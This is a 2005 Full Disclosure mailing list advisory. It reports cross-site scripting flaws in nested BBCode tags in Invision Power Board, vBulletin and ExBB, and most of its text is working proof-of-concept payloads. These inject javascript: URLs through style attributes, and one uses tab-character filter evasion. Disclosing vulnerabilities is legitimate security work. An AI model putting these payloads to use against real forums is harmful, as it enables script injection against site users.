Full Disclosure mailing list archives
XSS in the nested BB tag in many forum
From: "pigrelax" <pigrelax () yandex ru>
Date: Sat, 15 Jan 2005 16:13:38 +0300
XSS was found in the nested BB tag in many forum: Invision Power Board: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR] vBulletin [EMAIL=[URL=s as=`s () wew ew]mailto:assss () wew ew] sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t") ExBB [color='[url]http://rerer.rew[/url]]fffff[/color]' style=background:url(javascript:alert()); Other forum and other BB tag may be vulnerable. Examples above work only in Internet Explorer. More info - http://www.securitylab.ru/51808.html and antichat.ru/txt/IPB/index3.php _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
![http://aaa.aa/=`aaa.jpg[/IMG]]`](http://aaa.aa/=`aaa.jpg[/IMG]]`){kind=link}
Current thread:
- XSS in the nested BB tag in many forum pigrelax (Jan 15)